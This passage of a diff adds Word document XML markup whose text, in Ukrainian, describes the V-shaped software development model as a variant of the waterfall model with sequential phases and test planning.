+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>системи</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>аналізу</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розробки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проекту і т.д. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Цей</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>процес</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розробки</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>планів</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>випробування</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>позначений</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>лінією</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>між</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>прямокутниками</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> V-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>подібної</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>моделі</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель, показана на рис. 4.10, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>була</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>розроблена</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ізновид</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>каскадної</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>моделі</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, а значить, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>успадкувала</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>від</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>неї</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>таку</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ж </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>послідовну</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> структуру. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Кожна</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>наступна</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фаза </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>починається</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ісля</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>завершення</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>отримання</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>результативних</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>даних</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>попередньої</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фази</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Модель </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>демонструє</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>комплексний</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідхід</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> до </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>визначення</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> фаз </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>процесу</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
